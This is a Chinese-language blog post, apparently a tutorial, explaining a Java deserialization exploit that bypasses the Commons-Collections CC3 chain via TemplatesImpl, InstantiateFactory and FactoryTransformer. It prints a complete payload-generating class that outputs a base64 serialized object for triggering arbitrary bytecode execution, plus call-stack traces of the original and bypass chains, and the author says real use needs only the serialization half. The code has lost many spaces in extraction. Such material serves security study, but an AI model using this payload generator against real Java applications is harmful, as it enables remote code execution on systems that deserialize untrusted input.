反序列化动态调试从0.5到1

最新推荐文章于 2024-05-10 09:14:14 发布
最新推荐文章于 2024-05-10 09:14:14 发布
阅读量192 收藏
点赞数
文章标签: java jvm 开发语言 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42508548/article/details/129594746
版权

接上文https://articles.zsxq.com/id_0t5vt1gxmwab.html

前面如果有跟着做的人应该已经能够动态调试了吧,查看每一步数据有什么不同之处,在这里,我想先把上一步过程中的一些复杂的地方简单化,并且分开讲解其中的一些点。

步骤拆分

1、首先,先看一整个类,有这么长

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.FactoryTransformer;
import org.apache.commons.collections.functors.InstantiateFactory;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

publicclassCC3_bypass {
publicstaticvoidsetFieldValue(Object obj, String fieldName, Object
            value) {
try {
Fieldfield= obj.getClass().getDeclaredField(fieldName);
            field.setAccessible(true);
            field.set(obj, value);
        } catch (Exception e) {
        }
    }
publicstaticvoidmain(String[] args)throws Exception{
ConstantTransformerconstantTransformer=newConstantTransformer(1);
TemplatesImplobj=newTemplatesImpl();
        setFieldValue(obj, "_bytecodes", newbyte[][]{
                ClassPool.getDefault().get(Exp.class.getName()).toBytecode()
        });

        setFieldValue(obj, "_name", "1");
        setFieldValue(obj, "_tfactory", newTransformerFactoryImpl());

        InstantiateFactory instantiateFactory;
        instantiateFactory = newInstantiateFactory(com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter.class
                ,newClass[]{javax.xml.transform.Templates.class},newObject[]{obj});

FactoryTransformerfactoryTransformer=newFactoryTransformer(instantiateFactory);


MapinnerMap=newHashMap();

LazyMapouterMap= (LazyMap)LazyMap.decorate(innerMap, constantTransformer);

TiedMapEntrytme=newTiedMapEntry(outerMap, "keykey");

MapexpMap=newHashMap();
        expMap.put(tme, "valuevalue");
        setFieldValue(outerMap,"factory",factoryTransformer);

        outerMap.remove("keykey");


ByteArrayOutputStreambyteArrayOutputStream=newByteArrayOutputStream();
ObjectOutputStreamobjectOutputStream=newObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(expMap);

ByteArrayInputStreambyteArrayInputStream=newByteArrayInputStream(byteArrayOutputStream.toByteArray());
        Base64.Encoderencoder= Base64.getEncoder();
Stringencode= encoder.encodeToString(byteArrayOutputStream.toByteArray());
        System.out.println(encode);

ObjectInputStreamois=newObjectInputStream(new
ByteArrayInputStream(byteArrayOutputStream.toByteArray()));
Objecto= (Object)ois.readObject();
    }
}

2、如果让我简单拆分,应该分为以下几部分

第一部分,引用包,一般没什么特别注意的,就是引用了哪些包里面的代码,暂时不用特意关注

第二部分,反射方法 setFieldValue

作用是反射赋予某项某值,后面详细介绍

第三部分,获取恶意类对象 factoryTransformer

第四部分,反序列化核心部分,构造gadget chain的地方

第五部分,序列化与反序列化

各部分分析

第一部分 引用包

可以说是文件包含类的东西,需要某个类中的方法,就需要引用,没有什么需要详细讲的。

第二部分 setFieldValue

我也不知道是不是约定俗成的,明明是自己定义的方法,但是名字都是叫setFieldValue,详见ysoserial代码:ysoserial.payloads.util.Reflections

也有地方不使用定义一个方法这样的方式进行反射赋值,而是使用以下方式,效果是一样的。具体可以了解一下何为反射,这就是常见反射赋值的方式

第三部分 恶意类对象的获取

首先先看constantTransformer对象,内容为1,此处无实际意义。只是在创建HashMap恶意对象前,先传入一个无用的constantTransformer,最后再通过反射,将恶意的factoryTransformer赋值进去,避免了在序列化的时候就触发了恶意代码。

然后是TemplatesImpl对象的创建,有了解过TemplatesImpl的应该知道,这其实也是有一条利用链的,可以用来执行任意java恶意字节码

在newTransformer方法中,这里会调用到getTransletInstance

在getTransletInstance中,首先需要_name不为空,然后试_class为空,进而调用defineTransletClasses。下一步调用newInstance触发。

看下defineTransletClasses,这里需要_bytecodes不为空

往下走可以看到通过defineClass定义了恶意类,所以_bytecodes指定了恶意类字节码

往回走一点,loader的定义,这里调用了_tfactory.getExternalExtensionsMap(),所以需要给它赋值

第四部分 gadget chain

gadget chain即反序列化利用链。

原文表示此为CC3的绕过。

CC3原版的链

<init>:16, TemplatesImplEvil (com.classloader)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:62, NativeConstructorAccessorImpl (sun.reflect) [2]
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:423, Constructor (java.lang.reflect)
newInstance:442, Class (java.lang)
getTransletInstance:455, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
newTransformer:486, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
<init>:64, TrAXFilter (com.sun.org.apache.xalan.internal.xsltc.trax)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:62, NativeConstructorAccessorImpl (sun.reflect) [1]
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:423, Constructor (java.lang.reflect)
transform:106, InstantiateTransformer (org.apache.commons.collections.functors)
transform:123, ChainedTransformer (org.apache.commons.collections.functors)
get:158, LazyMap (org.apache.commons.collections.map)
getValue:74, TiedMapEntry (org.apache.commons.collections.keyvalue)
hashCode:121, TiedMapEntry (org.apache.commons.collections.keyvalue)
hash:338, HashMap (java.util)
readObject:1405, HashMap (java.util)
readObject:373, ObjectInputStream (java.io)

bypass链

<init>:11, Exp (org.example)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect) [2]
newInstance:62, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:423, Constructor (java.lang.reflect)
newInstance:442, Class (java.lang)
getTransletInstance:455, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
newTransformer:486, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
<init>:64, TrAXFilter (com.sun.org.apache.xalan.internal.xsltc.trax)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect) [1]
newInstance:62, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:423, Constructor (java.lang.reflect)
create:129, InstantiateFactory (org.apache.commons.collections.functors)
transform:73, FactoryTransformer (org.apache.commons.collections.functors)
get:158, LazyMap (org.apache.commons.collections.map)
getValue:74, TiedMapEntry (org.apache.commons.collections.keyvalue)
hashCode:121, TiedMapEntry (org.apache.commons.collections.keyvalue)
hash:338, HashMap (java.util)
readObject:1405, HashMap (java.util)
readObject:373, ObjectInputStream (java.io)
main:77, CC3_bypass (org.example)

看了之后可以发现,从ObjectInputStream.readObject一直到LazyMap.get,都是与原来的链相同的,不同点在这里

create:129, InstantiateFactory (org.apache.commons.collections.functors)
transform:73, FactoryTransformer (org.apache.commons.collections.functors)

这LazyMap.get处,可以指定调用到哪个类的transform方法,这里指定了FactoryTransformer

然后到org.apache.commons.collections.functors.FactoryTransformer#transform

构造方法控制iFactory的值,调用其create方法

在create方法中,调用newInstance,进而到CC3的后续部分

通过com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter 的构造方法中调用newTransformer()

TemplatesImpl通过newTransformer执行字节码

第五部分 序列化和反序列化

这里是一条反序列化的利用链,那么肯定少不了序列化和反序列化的过程,也就是此处,实际利用的话就是去掉后半部分,只留下序列化和输出序列化内容。

其中writeObject即是序列化关键函数

被序列化的对象为expMap,根据利用链知道,需要调用的是HashMap.readObject,所以这里也就是HashMap的对象

中间部分为输出序列化内容的base64,不需要的情况下也是可以注释掉的

最后是反序列化部分,readObject为关键函数

大夜猫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shiro反序列化脚本.zip
07-28
需要用到的俩个文件 ysoserial-master.jar 和 poc.py
Java原生反序列化漏洞利用链(URLDNS)
m0_55994898的博客
08-03 153
反序列化漏洞指在代码中存在不安全的反序列化操作(可控的序列化数据流入了反序列化方法中),在绝大多数编程语言中通常都有序列化/反序列化的功能(例如PHP,Java,Python),在序列化/反序列化的过程中通常会自动调用一些固定的方法,在PHP中序列化/反序列化时会调用对应类中的。
codeigniter 4.1.3 gadget chain
why811的博客
10-16 216
设置好的远程服务器将对发出的请求作出响应,并在响应头中返回一段php代码。这段php代码会被写入我们指定的curl日志文件中,也就是那个php文件。然后,此exp将发送请求到远程服务器,并在本地写入eee.php。这个方法将http请求发送到设置的远程服务器。在本地启动CodeIgniter框架,将exp的输出粘贴到。找到一条很有意思的codeigniter框架的链。所在目录启动一个简单的php http服务器。远程服务器上的index.php。为我们之前指定的php文件。类的对象,这个对象,在。
Java反序列化入门和内置序列化示例
weixin_42974824的博客
08-12 505
Java反序列化入门和内置序列化示例
软件作为信息系统的关键组成和代码重用攻击的防护
CSDNDi_Di的博客
03-17 319
软件作为信息系统的关键组成, 控制着计算机系统设备的工作方式, 其安全性关系到整个信息系统的安全、可靠和稳定.而软件作为人类智力活动的表达和产物, 在其规模和复杂程度迅速增长的同时, 就不可避免地存在漏洞(和缺陷)[1-3].在当前严峻的网络空间(cyberspace)安全形势下, 软件漏洞以其高威胁、难防御、普遍存在等特点, 被作为一种战略资源, 广泛用于攻防博弈中[4-6].而本文则是在当前系统架构和软件生态环境下, 从攻击和防护两个角度对软件漏洞利用中的二进制代码重用关键技术展开探讨和研究. 自19
Java 反序列化原理与基础,URLDNS攻击链分析
weixin_49248030的博客
11-03 638
​ 序列化是指将对象转化为字节流,其目的是便于对象在内存、文件、数据库或者网络之间传递。反序列化则是序列化的逆过程,即字节流转化为对象的过程,通常是程序将内存、文件、数据库或者网络传递的字节流还原成对象。在 Java 原生的API 中,序列化的过程由 ObjectOutputStream 类的 writeObject()方法实现,反序列化过程由 ObjectInputStream 类的 readObject()方法实现。
初识Java反序列化
m0_71563599的博客
06-04 1530
研究某产品反序列化EXP时,搜集到的POC只有一段16进制字节序列难以利用,遂有下文对Java序列化和反序列化的学习。大致内容如下:序列化和反序列化示例序列化数据组成解构反序列化漏洞形成原理序列化: 将程序运行时所需要的Java对象转化为字节序列并存储在文件系统中,一般为.ser后缀的文件,ObjectOutputStream.writeObject()方法可以将对象序列化。反序列化: 将存储在文件系统的字节序列转化成对象供程序使用,ObjectInputStream.readObject()方法可以将字节
Gadget寻找
kelxLZ的博客
06-25 463
Author:ZERO-A-ONE Date:2021-06-25 我们可以选择使用ROPgadget或者ropper两款工具 查找gadget: $ ROPgadget --binary [file] | grep "xxx" $ ropper --file [file] --search "xxx" 生成ROPchain: $ ropper --file [file] --chain execve $ ROPgadget --binary [file] --ropchain ...
Javaweb安全——反序列化漏洞-CC6链
weixin_43610673的博客
06-01 766
本文环境为 JDK8u11现在开始学习,Java 8u71之后,即高版本Java利用链,从CommonCollections6开始在 8u71之后AnnotationInvocationHandler的逻辑变成新建了一个LinkedHashMap对象,并将原来的键值添加进去,传进去的恶意Map不再执行set或put操作。而是通过invoke方法触发其get方法开始的,所以需要一个新的触发get方法的点,先看ysoserial当中CC6的 通过去触发get方法直接搜get,找到方法 查找其调用,跟踪到方法 要
java反序列化漏洞利用工具_Java 反序列化工具 gadgetinspector 初窥--上篇
weixin_39853892的博客
12-02 373
作者:Longofo@知道创宇404实验室时间:2019年9月4日原文链接:https://paper.seebug.org/1034/Java 反序列化工具 gadgetinspector 初窥--下篇起因一开始是听@Badcode师傅说的这个工具,在Black Hat 2018的一个议题提出来的。这是一个基于字节码静态分析的、利用已知技巧自动查找从source到sink的反序列化利用链工具。看...
c#序列化和反序列化
05-24
什么叫反序列化? 就是再把介质中的东西还原成对象,把石子还原成人的过程。 在进行这些操作的时候都需要这个可以被序列化,要能被序列化,就得给类头加[Serializable]特性。 通常网络程序为了传输安全才这么做。不...
深入分析Java的序列化与反序列化
12-22
序列化是一种对象持久化的手段。普遍应用在网络传输、RMI等场景中。本文通过分析ArrayList的序列化来介绍Java序列化的相关内容。主要涉及到以下几个问题:  怎么实现Java的序列化  为什么实现了java.io....
java序列化和反序列化,面试必备
12-21
反序列化:从IO流中恢复对象; 意义:序列化机制允许将实现序列化的Java对象转换为字节序列,并将字节序列保存在磁盘中,或通过网络传输,以达到以后恢复成原来的对象。序列化机制使地对象可以脱离程序的运行而独立...
深入理解C#序列化与反序列化的详解
01-01
序列化就是把一个对象保存到一个文件或数据库字段中去,反序列化就是在适当的时候把这个文件再转化成原来的对象使用。其目的是以某种存储形成使自定义对象持久化,或者将这种对象从一个地方传输到另一个地方。.NET...
java inspector_Gadgetinspector:一款针对Java应用程序库的字节码分析工具
weixin_39954569的博客
02-17 109
原标题:Gadgetinspector:一款针对Java应用程序库的字节码分析工具 GadgetinspectorGadgetinspector是一款针对Java应用程序/库的字节码分析工具,它可以帮助研究人员寻找和分析Java应用程序中的反序列化小工具链(Gadget Chain)。该项目可以检查Java代码库和类路径中的Gadget链,而Gadget链可以被用来构造针对反序列化漏洞的漏洞利用技...
Zend Framework 3.1.3 gadget chain
why811的博客
10-11 217
在推特上的账号发布了一条消息。一个名为Zend Framework的php框架出现了新的,可导致RCE。笔者尝试复现,但失败了。所幸,我基于此链,发现在这个框架的最新版本中的另一条链。
java jar包如何运行或调用
NLP与推荐算法
05-08 282
java服务启动
CMS垃圾回收器为什么被移除
最新发布
m0_54187478的博客
05-10 361
由于上述缺点,加上需要将资源投入到更现代垃圾回收器的开发和优化上,Oracle决定从Java 9开始标记CMS为废弃,并在后续版本中完全移除CMS。这些新的收集器旨在提供更低的停顿时间和更高的性能,同时减少配置和维护的复杂性。当它在垃圾收集周期内无法足够快地回收内存时,会退回到一种需要完全暂停所有应用线程的老年代收集模式,这与它设计的初衷相违背。:CMS使用的标记-清除算法会导致较多的内存碎片。:CMS需要更多的CPU资源来执行垃圾回收的并发阶段,而且它在运行时对系统资源的利用也较为激进。
Linux下网络编程-简易Epll服务器和客户端
weixin_45256307的博客
05-06 470
Linux下网络编程-简易Epll服务器和客户端
复杂xml序列化反序列化
05-08
XML序列化和反序列化是将对象转换为XML格式或将XML格式转换回对象的过程。如果要序列化或反序列化复杂的XML结构,需要遵循以下步骤: 1. 创建XML文档对象并定义XML命名空间。 2. 创建与XML结构相对应的类和属性,并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值